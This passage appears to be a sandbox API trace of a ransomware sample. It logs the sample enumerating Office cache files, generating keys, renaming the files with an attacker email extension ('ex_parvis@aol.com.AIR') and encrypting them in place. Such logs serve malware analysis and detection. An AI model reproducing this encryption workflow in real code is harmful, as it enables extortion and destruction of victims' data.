(in: hFile=0x4a4, lDistanceToMove=-174440, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.515] WriteFile (in: hFile=0x4a4, lpBuffer=0x30faa50*, nNumberOfBytesToWrite=0x2a968, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30faa50*, lpNumberOfBytesWritten=0x2acf9c8*=0x2a968, lpOverlapped=0x0) returned 1 [0151.515] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30d00e0 | out: hHeap=0x2e0000) returned 1 [0151.515] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30faa50 | out: hHeap=0x2e0000) returned 1 [0151.515] CloseHandle (hObject=0x4a4) returned 1 [0151.518] GetProcessHeap () returned 0x2e0000 [0151.518] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0151.518] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0151.518] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0151.518] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30d0048 | out: hHeap=0x2e0000) returned 1 [0151.518] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319d30 | out: hHeap=0x2e0000) returned 1 [0151.518] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x385620 [0151.518] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0151.518] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0151.518] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0151.518] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0151.518] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml", dwFileAttributes=0x80) returned 1 [0151.520] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 78 [0151.520] GetProcessHeap () returned 0x2e0000 [0151.520] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x102) returned 0x31d0048 [0151.520] lstrcpyW (in: lpString1=0x31d0048, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml" [0151.520] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.12781717671972518758.ex_parvis@aol.com.AIR" [0151.520] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0151.523] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4a4 [0151.523] GetProcessHeap () returned 0x2e0000 [0151.523] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x31d0048 | out: hHeap=0x2e0000) returned 1 [0151.523] GetFileSizeEx (in: hFile=0x4a4, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=4274) returned 1 [0151.523] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x10b2 [0151.523] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0151.523] GetProcessHeap () returned 0x2e0000 [0151.523] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0151.523] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0151.523] WriteFile (in: hFile=0x4a4, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0151.525] WriteFile (in: hFile=0x4a4, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0151.525] WriteFile (in: hFile=0x4a4, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0151.525] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10b2) returned 0x3a7410 [0151.525] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10b2) returned 0x3a84d0 [0151.525] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.525] ReadFile (in: hFile=0x4a4, lpBuffer=0x3a7410, nNumberOfBytesToRead=0x10b2, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3a7410*, lpNumberOfBytesRead=0x2acf9c8*=0x10b2, lpOverlapped=0x0) returned 1 [0151.526] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=-4274, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.526] WriteFile (in: hFile=0x4a4, lpBuffer=0x3a84d0*, nNumberOfBytesToWrite=0x10b2, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3a84d0*, lpNumberOfBytesWritten=0x2acf9c8*=0x10b2, lpOverlapped=0x0) returned 1 [0151.526] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a7410 | out: hHeap=0x2e0000) returned 1 [0151.526] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a84d0 | out: hHeap=0x2e0000) returned 1 [0151.526] CloseHandle (hObject=0x4a4) returned 1 [0151.527] GetProcessHeap () returned 0x2e0000 [0151.527] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0151.527] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0151.527] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0151.527] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385620 | out: hHeap=0x2e0000) returned 1 [0151.527] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385578 | out: hHeap=0x2e0000) returned 1 [0151.527] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x385578 [0151.527] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0151.527] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0151.527] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0151.527] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0151.527] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi", dwFileAttributes=0x80) returned 1 [0151.528] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 78 [0151.528] GetProcessHeap () returned 0x2e0000 [0151.528] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x102) returned 0x31d0048 [0151.528] lstrcpyW (in: lpString1=0x31d0048, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi" [0151.528] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi.12781717671972518758.ex_parvis@aol.com.AIR" [0151.528] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.msi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0151.531] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.msi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4a4 [0151.531] GetProcessHeap () returned 0x2e0000 [0151.531] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x31d0048 | out: hHeap=0x2e0000) returned 1 [0151.531] GetFileSizeEx (in: hFile=0x4a4, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=1992192) returned 1 [0151.531] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x1e6600 [0151.531] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0151.532] GetProcessHeap () returned 0x2e0000 [0151.532] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0151.532] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0151.532] WriteFile (in: hFile=0x4a4, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0151.533] WriteFile (in: hFile=0x4a4, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0151.534] WriteFile (in: hFile=0x4a4, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0151.534] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x1e6600) returned 0x33d0020 [0151.534] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x1e6600) returned 0x35c0020 [0151.534] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.534] ReadFile (in: hFile=0x4a4, lpBuffer=0x33d0020, nNumberOfBytesToRead=0x1e6600, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x1e6600, lpOverlapped=0x0) returned 1 [0151.598] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=-1992192, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.598] WriteFile (in: hFile=0x4a4, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x1e6600, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2acf9c8*=0x1e6600, lpOverlapped=0x0) returned 1 [0151.605] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33d0020 | out: hHeap=0x2e0000) returned 1 [0151.614] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x35c0020 | out: hHeap=0x2e0000) returned 1 [0151.622] CloseHandle (hObject=0x4a4) returned 1 [0151.633] GetProcessHeap () returned 0x2e0000 [0151.633] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0151.633] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0151.633] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0151.633] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385578 | out: hHeap=0x2e0000) returned 1 [0151.633] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3854d0 | out: hHeap=0x2e0000) returned 1 [0151.634] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x90) returned 0x319d30 [0151.634] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385368 | out: hHeap=0x2e0000) returned 1 [0151.634] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x329238 | out: hHeap=0x2e0000) returned 1 [0151.634] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e198 | out: hHeap=0x2e0000) returned 1 [0151.634] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5cd3a40, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0x97242fd0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x97242fd0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x35e1d8 [0151.634] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0151.634] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0151.634] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x329238 [0151.634] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0151.634] GetLastError () returned 0x0 [0151.634] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc0) returned 0x30e128 [0151.634] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x329238 | out: hHeap=0x2e0000) returned 1 [0151.634] GetLastError () returned 0x0 [0151.635] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344500 [0151.635] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x360c88 [0151.635] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x360c88 | out: hHeap=0x2e0000) returned 1 [0151.635] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x350db8 [0151.635] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x35e218 [0151.635] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x35e218 | out: hHeap=0x2e0000) returned 1 [0151.635] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0151.635] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0151.635] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x350db8 | out: hHeap=0x2e0000) returned 1 [0151.635] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344500 | out: hHeap=0x2e0000) returned 1 [0151.635] FindNextFileW (in: hFindFile=0x35e1d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5cd3a40, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0x97242fd0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x97242fd0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0151.635] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0151.635] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0151.635] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x329238 [0151.635] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0151.635] GetLastError () returned 0x0 [0151.635] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc0) returned 0x30e128 [0151.635] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x329238 | out: hHeap=0x2e0000) returned 1 [0151.635] GetLastError () returned 0x0 [0151.635] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344500 [0151.635] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x360c88 [0151.635] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x360c88 | out: hHeap=0x2e0000) returned 1 [0151.635] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x350db8 [0151.635] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x35e218 [0151.635] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x35e218 | out: hHeap=0x2e0000) returned 1 [0151.635] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0151.636] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0151.636] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x350db8 | out: hHeap=0x2e0000) returned 1 [0151.636] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344500 | out: hHeap=0x2e0000) returned 1 [0151.636] FindNextFileW (in: hFindFile=0x35e1d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x87078450, ftCreationTime.dwHighDateTime=0x1cb147f, ftLastAccessTime.dwLowDateTime=0x87078450, ftLastAccessTime.dwHighDateTime=0x1cb147f, ftLastWriteTime.dwLowDateTime=0xa5d1e590, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x1e6600, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Office32WW.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1 [0151.636] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0151.636] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0151.636] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x329238 [0151.636] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0151.636] GetLastError () returned 0x0 [0151.636] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc0) returned 0x30e128 [0151.636] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x329238 | out: hHeap=0x2e0000) returned 1 [0151.636] GetLastError () returned 0x0 [0151.636] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x350db8 [0151.636] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344500 [0151.636] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0151.636] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0151.636] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344500 | out: hHeap=0x2e0000) returned 1 [0151.636] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x350db8 | out: hHeap=0x2e0000) returned 1 [0151.636] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x3854d0 [0151.636] FindNextFileW (in: hFindFile=0x35e1d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x87abdaa0, ftCreationTime.dwHighDateTime=0x1cb147f, ftLastAccessTime.dwLowDateTime=0x87abdaa0, ftLastAccessTime.dwHighDateTime=0x1cb147f, ftLastWriteTime.dwLowDateTime=0xa5cd2aa0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x10b2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Office32WW.xml", cAlternateFileName="OFFICE~1.XML")) returned 1 [0151.636] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0151.636] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0151.636] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x329238 [0151.636] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0151.636] GetLastError () returned 0x0 [0151.636] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc0) returned 0x30e128 [0151.636] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x329238 | out: hHeap=0x2e0000) returned 1 [0151.636] GetLastError () returned 0x0 [0151.636] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x350db8 [0151.636] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344500 [0151.636] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0151.637] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0151.637] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344500 | out: hHeap=0x2e0000) returned 1 [0151.637] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x350db8 | out: hHeap=0x2e0000) returned 1 [0151.637] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x385578 [0151.637] FindNextFileW (in: hFindFile=0x35e1d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xfe57f8e0, ftCreationTime.dwHighDateTime=0x1cbe1cb, ftLastAccessTime.dwLowDateTime=0xfe57f8e0, ftLastAccessTime.dwHighDateTime=0x1cbe1cb, ftLastWriteTime.dwLowDateTime=0xa8bafbc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2a968, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ose.exe", cAlternateFileName="")) returned 1 [0151.637] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0151.637] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0151.637] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x329238 [0151.637] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0151.637] GetLastError () returned 0x0 [0151.637] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc0) returned 0x30e128 [0151.637] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x329238 | out: hHeap=0x2e0000) returned 1 [0151.637] GetLastError () returned 0x0 [0151.637] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344500 [0151.637] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0151.637] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0151.637] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344500 | out: hHeap=0x2e0000) returned 1 [0151.637] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x90) returned 0x385368 [0151.637] FindNextFileW (in: hFindFile=0x35e1d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6644b620, ftCreationTime.dwHighDateTime=0x1cb04b2, ftLastAccessTime.dwLowDateTime=0x6644b620, ftLastAccessTime.dwHighDateTime=0x1cb04b2, ftLastWriteTime.dwLowDateTime=0xa81b8770, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, 